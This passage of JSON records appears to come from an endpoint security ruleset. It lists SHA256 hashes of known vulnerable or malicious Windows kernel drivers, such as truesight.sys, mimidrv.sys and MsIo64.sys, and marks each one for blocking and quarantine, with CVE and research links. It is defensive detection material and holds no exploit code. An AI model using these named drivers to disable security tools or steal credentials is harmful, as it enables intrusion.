+ "hl_testing_start_time": "2026-03-23T11:45:30.831628Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d1b43ce1b90845a1a4af7c1ece3d2d69c84c0a7e83d0f59c880756bb098fca4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "248fe219-024e-5aed-9ce7-96f3ef8f2b21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614472Z",
+ "creation_date": "2026-03-23T11:45:29.614474Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3124b0411b8077605db2a9b7909d8240e0d554496600e2706e531c93c931e1b5",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24b20cae-35a9-5bd5-961a-772ebf23b226",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827348Z",
+ "creation_date": "2026-03-23T11:45:31.827350Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ad13e0a80edc24ae3c49b2c525cceef5aa73011c0aa8f09a15083c5a16229195",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24b525fb-240b-526f-b856-c4a76d75d5ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148723Z",
+ "creation_date": "2026-03-23T11:45:31.148725Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148730Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7bb22f60323c32d2b8b85c8d31aae9ea27e9a61c232b5d0cbda4893632fe513b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24c22ac9-3ac8-52a0-be4b-1d8d7776ac6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832040Z",
+ "creation_date": "2026-03-23T11:45:30.832042Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "67cdfbe63f6dcdd24e4e2531cb082990d5c062f025dd05e711449eb38f4485f3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24c702b6-536d-54f8-a38a-0087eddaaed6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613666Z",
+ "creation_date": "2026-03-23T11:45:29.613668Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24ce6ed1-45ee-52e5-b799-612c9d1ad586",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467267Z",
+ "creation_date": "2026-03-23T11:45:30.467271Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89ec70089d61eccb9021edc6f1b50a9ef99196467a011e1dc7d0325aa51b7dff",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24d85f30-810c-5c37-ad2a-7e5133f003d3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614076Z",
+ "creation_date": "2026-03-23T11:45:29.614078Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614083Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfcf32f5662791f1f22a77acb6dddfbc970fe6e99506969b3ea67c03f67687ab",
+ "comment": "MICSYS Technology driver (aka MsIo64.sys) [CVE-2019-18845] [https://github.com/kkent030315/MsIoExploit] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24e0b9c0-8a84-54dc-bfae-d67572c60c98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157153Z",
+ "creation_date": "2026-03-23T11:45:31.157155Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157160Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ca6955adf0cb9b059f228d1460b2647b34654a0bf4391ac874c3ec02aa86b74c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24f21b1e-feb2-5414-8ac1-d162c9b17a5a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618514Z",
+ "creation_date": "2026-03-23T11:45:29.618516Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618522Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91ee89520105ccbceca6ee0e34070f28c8dc5a3d73ec65f384da5da4f2a36dc0",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24f2ba77-8d4b-5fdf-9944-43336a97d16a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143742Z",
+ "creation_date": "2026-03-23T11:45:32.143744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143750Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf1264cf5b9ca687a447a5021394db27eecf31f009185deb634b32f7ed49f620",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24f33bf0-bef2-58cb-bf4a-a3bca138d75a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.158897Z",
+ "creation_date": "2026-03-23T11:45:31.158899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.158905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24179779724d229c5a0a0a9ebd442936882496556ccb9ab5943aa9bfc63cf2a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24f4a8d7-6e98-5ec3-9b1c-9ba19d60ff76",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812011Z",
+ "creation_date": "2026-03-23T11:45:31.812012Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "049b22ea9712994036b3240d026d85d9c4699ead7c593e66e5f845c51cc7e6d5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "24f821ab-2000-5aa8-83b9-0d2a4f4e8921",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461971Z",
+ "creation_date": "2026-03-23T11:45:30.461975Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "accb1a6604efb1b3ce9345c9fd62fe717a84c3e089e09c638e461df89193ef01",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2506272d-ec09-5199-8431-9e6d5123a475",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143613Z",
+ "creation_date": "2026-03-23T11:45:32.143615Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143620Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1698ba7eeee6ff9272cc25b242af89190ff23fd9530f21aa8f0f3792412594f3",
+ "comment": "Vulnerable Kernel Driver (aka DcProtect.sys) [https://www.loldrivers.io/drivers/7cee2ce8-7881-4a9a-bb18-61587c95f4a2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2509a2ea-ece4-52af-9716-dcb806fef5ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617695Z",
+ "creation_date": "2026-03-23T11:45:29.617697Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617702Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6",
+ "comment": "Cheat Engine dangerous driver (aka dbk64.sys) [https://www.loldrivers.io/drivers/1524a54d-520d-4fa4-a7d5-aaaa066fbfc4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "250af9c6-1320-57aa-aaa1-21d48ec88415",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968367Z",
+ "creation_date": "2026-03-23T11:45:29.968369Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "995284d05f947e2db58ece30b6d61653a2b94b2c337e5c75ca8315793e0b3955",
+ "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "250bb6a7-a152-5de2-8bdf-c00186555d48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146744Z",
+ "creation_date": "2026-03-23T11:45:31.146746Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146751Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3a71944dd57948f2cda64fac2f9407f099dbd7744f5bdd7fe9500703af0fb553",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "250c1b07-af0f-5c58-b42d-d7ae7d6e8a85",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486105Z",
+ "creation_date": "2026-03-23T11:45:31.486109Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486119Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd487838b9b0eb272db9dd09b40ef5826b523f9f48d44130b4c1a53ed2182323",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "250f1f91-222b-50fe-8ae9-a4086d2a5040",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145236Z",
+ "creation_date": "2026-03-23T11:45:31.145238Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145243Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1726cc742dcad64d0993f833b26f7c314fb4b3ee999e7cdc371bde6dec26afef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "251585db-48a8-5da7-b2c3-372879427e9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495779Z",
+ "creation_date": "2026-03-23T11:45:31.495781Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495786Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fbed48e78c6e4a9c190fc7b98b33b0b61890d8eaacc3df3c9f97f6f3430f8a8c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "251f9569-4927-597e-8cf2-ea160a03498c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833119Z",
+ "creation_date": "2026-03-23T11:45:30.833123Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833132Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de3fe9e38a3e471599a831f583c3f568f7ecb9629a1b57621028f6934a636047",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "25225aeb-b715-54d9-beb9-e75fea40a791",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973569Z",
+ "creation_date": "2026-03-23T11:45:29.973571Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973576Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
